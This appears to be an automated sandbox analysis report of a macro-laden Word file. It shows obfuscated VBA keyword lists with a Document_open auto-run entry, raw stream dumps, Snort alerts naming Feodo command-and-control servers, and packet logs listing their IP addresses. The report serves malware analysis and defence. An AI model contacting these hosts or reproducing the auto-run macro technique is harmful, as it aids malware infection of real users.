                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 92 a6 8c 67 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      Xqcxarraokjbi
                                                                      False
                                                                      Private
                                                                      VB_Exposed
                                                                      Attribute
                                                                      VB_Creatable
                                                                      VB_Name
                                                                      Document_open()
                                                                      VB_Customizable
                                                                      VB_PredeclaredId
                                                                      VB_GlobalNameSpace
                                                                      VB_Base
                                                                      VB_TemplateDerived
                                                                      VBA Code
                                                                      VBA File Name: Nst6otvnmgmpw, Stream Size: 17602
                                                                      General
                                                                      Stream Path:Macros/VBA/Nst6otvnmgmpw
                                                                      VBA File Name:Nst6otvnmgmpw
                                                                      Stream Size:17602
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 a4 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff ac 05 00 00 9c 30 00 00 00 00 00 00 01 00 00 00 92 a6 3f ad 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      crnYCaC
                                                                      RYtzeF
                                                                      ClofCvn
                                                                      BlbPRi:
                                                                      Left(vpWmJA.Range.ParagraphStyle,
                                                                      BlbPRi)
                                                                      kBCITgNAC.Range.ListFormat.ListString
                                                                      aqFpElJ
                                                                      tFspDCJEJ
                                                                      djUnAEBd.Range.ParagraphStyle
                                                                      QjbRmCII
                                                                      rknGHpIJ
                                                                      RmTjACo
                                                                      jdDhS
                                                                      ah_sg
                                                                      InStr(kBCITgNAC.Range.Text,
                                                                      MscjBIE.Range.ParagraphStyle
                                                                      sDmVCG
                                                                      TpAnAB.Range.Text
                                                                      dUBsAD
                                                                      ORjdHplF.Range.Text
                                                                      ueWFHDCC
                                                                      QpteDQ
                                                                      wNsHseJob
                                                                      DagVrchHi.Range.Text
                                                                      NcnmJ
                                                                      aiupjCA.Range.ParagraphStyle
                                                                      pbPXFg
                                                                      SeBOI
                                                                      wgusFA
                                                                      VrghdcJA.Range.Text
                                                                      vXdLFECJ
                                                                      ElseIf
                                                                      pbPXFg.Range.ParagraphStyle
                                                                      mWRkEDBn
                                                                      swJREBktH
                                                                      Len("xxx"))
                                                                      DagVrchHi
                                                                      GvZhcxcBE.Range.ListFormat.ListString
                                                                      clyZlt.Range.ParagraphStyle
                                                                      kBCITgNAC.Range.Text
                                                                      QurlJAjI
                                                                      ah:wsg
                                                                      Left(ORjdHplF.Range.ParagraphStyle,
                                                                      EGxLDh
                                                                      ifZhJxP
                                                                      BdbvZ
                                                                      InStr(KekJrc.Range.Text,
                                                                      SEEmDH
                                                                      ihnSRH
                                                                      djUnAEBd.Range.Text
                                                                      kYUGGMJ.Range.ListFormat.ListString
                                                                      JJqbCtEH
                                                                      ahpsg
                                                                      InStr(MscjBIE.Range.Text,
                                                                      ZBXzADzi
                                                                      dPYykYG
                                                                      InStr(TpAnAB.Range.Text,
                                                                      TpAnAB.Range.ListFormat.ListString
                                                                      Replace(saw,
                                                                      kBCITgNAC.Range.ParagraphStyle
                                                                      ilrmFI
                                                                      QyjOFbQGB
                                                                      Left(GvZhcxcBE.Range.ParagraphStyle,
                                                                      IGyeHIDF
                                                                      DMzpFn
                                                                      MFcvbrIeP
                                                                      WHeXGpVAC
                                                                      nWADOALQ
                                                                      ORjdHplF.Range.ParagraphStyle
                                                                      clyLjDhC
                                                                      oSnKJGCv
                                                                      ODMoFC)
                                                                      CJIuIYEKI
                                                                      KoPDIC
                                                                      gnnIFFf
                                                                      djUnAEBd.Range.ListFormat.ListString
                                                                      XSZpp
                                                                      QrQLEAI
                                                                      hnsxGG
                                                                      tfnHGB
                                                                      LCIxEHv
                                                                      ORjdHplF.Range.ListFormat.ListString
                                                                      Resume
                                                                      vpWmJA.Range.ParagraphStyle
                                                                      InStr(clyZlt.Range.Text,
                                                                      PAyxzTsC
                                                                      dwTYCJwLC)
                                                                      GLKaFEDcX
                                                                      PEaiK.Range.Text
                                                                      zjQpkF
                                                                      KekJrc.Range.ListFormat.ListString
                                                                      wJKPQpiH
                                                                      Left(kYUGGMJ.Range.ParagraphStyle,
                                                                      ruwfBB
                                                                      QrQLEAI:
                                                                      GHJmFFAIm)
                                                                      golkzCJBD
                                                                      FdSuG
                                                                      OtoVEFFI
                                                                      QrQLEAI)
                                                                      "hqkwjbjdasd"
                                                                      GHJmFFAIm:
                                                                      LEeUqk
                                                                      Left(clyZlt.Range.ParagraphStyle,
                                                                      ZAXDGY
                                                                      KnxFzdf
                                                                      kYUGGMJ.Range.ParagraphStyle
                                                                      ubHTxDED
                                                                      LqcVa
                                                                      Left(djUnAEBd.Range.ParagraphStyle,
                                                                      aqFpElJ.Range.Text
                                                                      GvZhcxcBE
                                                                      twfalBEJ
                                                                      HmUuEIbVG
                                                                      KekJrc.Range.Text
                                                                      vpWmJA.Range.Text
                                                                      iGMIJABIz
                                                                      uRNYED
                                                                      ORjdHplF
                                                                      DrqvEr
                                                                      LGONCIz
                                                                      Left(MscjBIE.Range.ParagraphStyle,
                                                                      kyTwIN
                                                                      wTLHBUFzI
                                                                      wNsHseJob.Range.ParagraphStyle
                                                                      WLdYLJOB
                                                                      YfXWF
                                                                      VrzOGkkDJ
                                                                      EWTFmUdCA
                                                                      dUBsAD)
                                                                      KekJrc
                                                                      sVBjGLE
                                                                      dUBsAD:
                                                                      xWqeABhHw
                                                                      bssipAJC
                                                                      Left(pbPXFg.Range.ParagraphStyle,
                                                                      GvZhcxcBE.Range.ParagraphStyle
                                                                      Xqcxarraokjbi()
                                                                      BApwTCG
                                                                      ahgmsg
                                                                      VB_Name
                                                                      CzpmH
                                                                      wTHGJGJ
                                                                      VrghdcJA.Range.ListFormat.ListString
                                                                      wZFCUdE)
                                                                      BRoZbEF
                                                                      wZFCUdE:
                                                                      IEHycIT
                                                                      aqFpElJ.Range.ParagraphStyle
                                                                      "xxxx"
                                                                      bxSXGCyrq
                                                                      rQGxCbRtR
                                                                      aqFpElJ.Range.ListFormat.ListString
                                                                      Mid(Application.Name,
                                                                      InStr(aqFpElJ.Range.Text,
                                                                      aNLHyKGxD
                                                                      InStr(kYUGGMJ.Range.Text,
                                                                      NirTjIE
                                                                      Left(DagVrchHi.Range.ParagraphStyle,
                                                                      aJzPBis.Range.ListFormat.ListString
                                                                      ODMoFC
                                                                      CJIuIYEKI)
                                                                      HwQjGFBhp
                                                                      VrghdcJA.Range.ParagraphStyle
                                                                      CJIuIYEKI:
                                                                      qOgvIXcc
                                                                      PIEpnIEQ
                                                                      InStr(wNsHseJob.Range.Text,
                                                                      TpAnAB.Range.ParagraphStyle
                                                                      AZyYMo
                                                                      RpARJ
                                                                      Paragraph
                                                                      ODMoFC:
                                                                      InStr(aJzPBis.Range.Text,
                                                                      YfXWF)
                                                                      BlbPRi
                                                                      BApwTCG.Range.ParagraphStyle
                                                                      KekJrc.Range.ParagraphStyle
                                                                      xmKhhI
                                                                      Left(PEaiK.Range.ParagraphStyle,
                                                                      PEaiK.Range.ListFormat.ListString
                                                                      ahinsg
                                                                      polxC
                                                                      ahmsg
                                                                      clyZlt.Range.Text
                                                                      vpWmJA.Range.ListFormat.ListString
                                                                      dwTYCJwLC:
                                                                      JozvGJc
                                                                      BApwTCG.Range.ListFormat.ListString
                                                                      ahssg
                                                                      rlKgn
                                                                      PEaiK
                                                                      Left(wNsHseJob.Range.ParagraphStyle,
                                                                      aJzPBis
                                                                      chPFBOFy
                                                                      PyQuEPBH
                                                                      QxPrAc
                                                                      wZFCUdE
                                                                      lSOmIHg
                                                                      GHJmFFAIm
                                                                      gzBJqD
                                                                      BApwTCG.Range.Text
                                                                      yVvECoEYV
                                                                      Left(BApwTCG.Range.ParagraphStyle,
                                                                      InStr(VrghdcJA.Range.Text,
                                                                      Left(KekJrc.Range.ParagraphStyle,
                                                                      Left(aJzPBis.Range.ParagraphStyle,
                                                                      hnsxGG)
                                                                      InStr(BApwTCG.Range.Text,
                                                                      AYQZHEBI
                                                                      elbdiLVN
                                                                      vttGko
                                                                      aiupjCA.Range.ListFormat.ListString
                                                                      InStr(vpWmJA.Range.Text,
                                                                      DagVrchHi.Range.ParagraphStyle
                                                                      PIEpnIEQ)
                                                                      dueIMGo
                                                                      GvZhcxcBE.Range.Text
                                                                      PIEpnIEQ:
                                                                      InStr(pbPXFg.Range.Text,
                                                                      DdtFCGIA
                                                                      Left(VrghdcJA.Range.ParagraphStyle,
                                                                      MscjBIE.Range.Text
                                                                      HgufGDBpC
                                                                      BjqtUGzGV
                                                                      "kkiew")
                                                                      LATJAGVFG
                                                                      fishDz
                                                                      Function
                                                                      InStr(PEaiK.Range.Text,
                                                                      IpndaHM
                                                                      "sjgwb",
                                                                      jhoJOEJc
                                                                      QyjOFbQGB)
                                                                      vpWmJA
                                                                      igIuH
                                                                      DMzpFn)
                                                                      QyjOFbQGB:
                                                                      kYUGGMJ
                                                                      DMzpFn:
                                                                      VGSqAr
                                                                      QgrUG
                                                                      jVymJ
                                                                      Left(aqFpElJ.Range.ParagraphStyle,
                                                                      TpXhGgIp
                                                                      kYUGGMJ.Range.Text
                                                                      OnCoGHI
                                                                      zfIxDdGy
                                                                      uRNYED)
                                                                      pbPXFg.Range.ListFormat.ListString
                                                                      clyZlt.Range.ListFormat.ListString
                                                                      IyCjJCAKS
                                                                      uRNYED:
                                                                      wNsHseJob.Range.ListFormat.ListString
                                                                      kBCITgNAC
                                                                      HFzCp
                                                                      aiupjCA.Range.Text
                                                                      mNAmBCKAC
                                                                      clyZlt
                                                                      hHdBIMIgE
                                                                      MllKTIJEc
                                                                      aJzPBis.Range.Text
                                                                      InStr(GvZhcxcBE.Range.Text,
                                                                      cLxQFB
                                                                      vYqwDI
                                                                      ahcesg
                                                                      ahrosg
                                                                      GLKaFEDcX:
                                                                      lscaG
                                                                      GLKaFEDcX)
                                                                      EiZIHkBmm
                                                                      yigPu
                                                                      CITOv
                                                                      nATRHnACI
                                                                      aiupjCA
                                                                      DagVrchHi.Range.ListFormat.ListString
                                                                      MscjBIE.Range.ListFormat.ListString
                                                                      vlZuYFCC
                                                                      clyLjDhC)
                                                                      ruwfBB)
                                                                      dwTYCJwLC
                                                                      ATQXIsF
                                                                      rvAquNI
                                                                      ruwfBB:
                                                                      clyLjDhC:
                                                                      pbPXFg.Range.Text
                                                                      wNsHseJob.Range.Text
                                                                      zhliJ
                                                                      RxTZR
                                                                      TpAnAB
                                                                      ahtsg
                                                                      bebkDqAH
                                                                      VrghdcJA
                                                                      kFOCACABC
                                                                      Error
                                                                      aiaDHfVAA
                                                                      InStr(DagVrchHi.Range.Text,
                                                                      Attribute
                                                                      FTbqcNF
                                                                      YfXWF:
                                                                      MscjBIE
                                                                      wuVfVIU
                                                                      InStr(aiupjCA.Range.Text,
                                                                      mJzxEXG
                                                                      NVFQOFAXs
                                                                      InStr(ORjdHplF.Range.Text,
                                                                      hnsxGG:
                                                                      PEaiK.Range.ParagraphStyle
                                                                      ykoqBxAG
                                                                      xvhwEkIi
                                                                      HpOdl
                                                                      bEIjwUFFB
                                                                      wHzvQRHCw
                                                                      aJzPBis.Range.ParagraphStyle
                                                                      InStr(djUnAEBd.Range.Text,
                                                                      zfIxDdGy)
                                                                      VGSqAr)
                                                                      zfIxDdGy:
                                                                      Left(aiupjCA.Range.ParagraphStyle,
                                                                      VGSqAr:
                                                                      djUnAEBd
                                                                      Left(kBCITgNAC.Range.ParagraphStyle,
                                                                      Left(TpAnAB.Range.ParagraphStyle,
                                                                      uqBHEDw
                                                                      EqstFcEf
                                                                      NrnOEeCi
                                                                      EBTVGH
                                                                      DvhBN
                                                                      VBA Code
                                                                      VBA File Name: Xxuu21l7kiwbxwj_0, Stream Size: 704
                                                                      General
                                                                      Stream Path:Macros/VBA/Xxuu21l7kiwbxwj_0
                                                                      VBA File Name:Xxuu21l7kiwbxwj_0
                                                                      Stream Size:704
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 92 a6 06 e8 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      Attribute
                                                                      VB_Name
                                                                      VBA Code

                                                                      Streams

                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      File Type:data
                                                                      Stream Size:146
                                                                      Entropy:4.00187355764
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                      General
                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                      File Type:data
                                                                      Stream Size:4096
                                                                      Entropy:0.280441275353
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 1536
                                                                      General
                                                                      Stream Path:\x5SummaryInformation
                                                                      File Type:data
                                                                      Stream Size:1536
                                                                      Entropy:7.89109371025
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . P . . . . . B . . . . . G . j M . . . M h l . f . N . . . . . . r . . . . . . . a Z # . . . . = . . . 5 . . . ] 9 . H k ^ % . P . . D L . . R . . . . . H . . 0 n . . . . . . . . q W @ . ) . ; x . . . \\ . . . . . . . . . . . # . . . . . l q . e : B . . K Z J . . u . . . . . . * . . _ 6 7 \\ . . s , . . . f . . . X G ( . . W G . E . . Y E . . . q . . / . . . . . - v . . . . . . . . . t \\ . . @ . . . . - . . . . . . . . U a p . . * . . 8 . . I h . ; . P . . . . . ( . 1 . ! . . I . . . . . L U . . d F K
                                                                      Data Raw:9e e2 50 ca ff 20 19 ba 1a 42 ed f4 d8 85 b6 47 83 6a 4d ab 18 0e 4d 68 6c c6 66 d0 4e bc 1c 0b a4 ce 82 72 fa cf 91 fa d4 95 10 61 5a 23 1c cf a0 e0 3d 83 19 bf 35 8f 94 e8 5d 39 ba 48 6b 5e 25 e2 50 0a 03 44 4c b3 d9 52 d6 83 fd ec 0d 48 aa 96 30 6e 7f 99 f2 e4 99 f2 de 12 71 57 40 8b 29 b2 3b 78 d3 11 cb 5c 93 89 aa c7 e9 b1 92 a7 da 14 8f 23 18 fc df 8c ef 6c 71 11 65 3a 42 81
                                                                      Stream Path: 1Table, File Type: data, Stream Size: 6861
                                                                      General
                                                                      Stream Path:1Table
                                                                      File Type:data
                                                                      Stream Size:6861
                                                                      Entropy:6.02892947961
                                                                      Base64 Encoded:True
                                                                      Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                      Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 517
                                                                      General
                                                                      Stream Path:Macros/PROJECT
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Stream Size:517
                                                                      Entropy:5.51044136587
                                                                      Base64 Encoded:True
                                                                      Data ASCII:I D = " { 2 1 D F 1 D 8 3 - D A C 6 - 4 F C E - A 9 4 D - 2 C 7 0 E C 4 6 E 1 7 0 } " . . D o c u m e n t = B c u r 5 6 9 9 z 4 d / & H 0 0 0 0 0 0 0 0 . . M o d u l e = X x u u 2 1 l 7 k i w b x w j _ 0 . . M o d u l e = N s t 6 o t v n m g m p w . . E x e N a m e 3 2 = " W 9 i 7 s t p l 0 2 4 v g x r " . . N a m e = " Q w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 F 8 D 9 9 E 4 A 7 6 C E A 7 0 E A 7 0 E A 7 0 E A 7 0 " . . D P
                                                                      Data Raw:49 44 3d 22 7b 32 31 44 46 31 44 38 33 2d 44 41 43 36 2d 34 46 43 45 2d 41 39 34 44 2d 32 43 37 30 45 43 34 36 45 31 37 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 63 75 72 35 36 39 39 7a 34 64 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 58 78 75 75 32 31 6c 37 6b 69 77 62 78 77 6a 5f 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 73 74 36 6f 74 76 6e 6d 67 6d 70 77 0d 0a 45 78
                                                                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 134
                                                                      General
                                                                      Stream Path:Macros/PROJECTwm
                                                                      File Type:data
                                                                      Stream Size:134
                                                                      Entropy:3.95084728485
                                                                      Base64 Encoded:False
                                                                      Data ASCII:B c u r 5 6 9 9 z 4 d . B . c . u . r . 5 . 6 . 9 . 9 . z . 4 . d . . . X x u u 2 1 l 7 k i w b x w j _ 0 . X . x . u . u . 2 . 1 . l . 7 . k . i . w . b . x . w . j . _ . 0 . . . N s t 6 o t v n m g m p w . N . s . t . 6 . o . t . v . n . m . g . m . p . w . . . . .
                                                                      Data Raw:42 63 75 72 35 36 39 39 7a 34 64 00 42 00 63 00 75 00 72 00 35 00 36 00 39 00 39 00 7a 00 34 00 64 00 00 00 58 78 75 75 32 31 6c 37 6b 69 77 62 78 77 6a 5f 30 00 58 00 78 00 75 00 75 00 32 00 31 00 6c 00 37 00 6b 00 69 00 77 00 62 00 78 00 77 00 6a 00 5f 00 30 00 00 00 4e 73 74 36 6f 74 76 6e 6d 67 6d 70 77 00 4e 00 73 00 74 00 36 00 6f 00 74 00 76 00 6e 00 6d 00 67 00 6d 00 70 00
                                                                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5553
                                                                      General
                                                                      Stream Path:Macros/VBA/_VBA_PROJECT
                                                                      File Type:data
                                                                      Stream Size:5553
                                                                      Entropy:5.57459869251
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                      Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 672
                                                                      General
                                                                      Stream Path:Macros/VBA/dir
                                                                      File Type:data
                                                                      Stream Size:672
                                                                      Entropy:6.35085469527
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . Q 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . [ . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                                                      Data Raw:01 9c b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 51 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 5b d8 f7 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                                      Stream Path: WordDocument, File Type: data, Stream Size: 113278
                                                                      General
                                                                      Stream Path:WordDocument
                                                                      File Type:data
                                                                      Stream Size:113278
                                                                      Entropy:7.3453177245
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 ad 5d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e ba 01 00 62 7f 00 00 62 7f 00 00 ad 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      01/27/21-12:17:35.820429TCP1201ATTACK-RESPONSES 403 Forbidden8049165191.6.196.95192.168.2.22
                                                                      01/27/21-12:18:49.250556TCP2404344ET CNC Feodo Tracker Reported CnC Server TCP group 234917580192.168.2.2284.232.229.24
                                                                      01/27/21-12:18:57.070442TCP2404334ET CNC Feodo Tracker Reported CnC Server TCP group 18491768080192.168.2.2251.255.203.164

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 27, 2021 12:17:35.289449930 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:35.538330078 CET8049165191.6.196.95192.168.2.22
                                                                      Jan 27, 2021 12:17:35.538538933 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:35.541695118 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:35.788208008 CET8049165191.6.196.95192.168.2.22
                                                                      Jan 27, 2021 12:17:35.820429087 CET8049165191.6.196.95192.168.2.22
                                                                      Jan 27, 2021 12:17:36.017745018 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:36.147525072 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:36.328591108 CET804916675.103.81.81192.168.2.22
                                                                      Jan 27, 2021 12:17:36.328808069 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:36.329037905 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:36.511939049 CET804916675.103.81.81192.168.2.22
                                                                      Jan 27, 2021 12:17:36.515872955 CET804916675.103.81.81192.168.2.22
                                                                      Jan 27, 2021 12:17:36.735344887 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:36.996504068 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:37.249649048 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.249882936 CET49167443192.168.2.22177.12.170.95
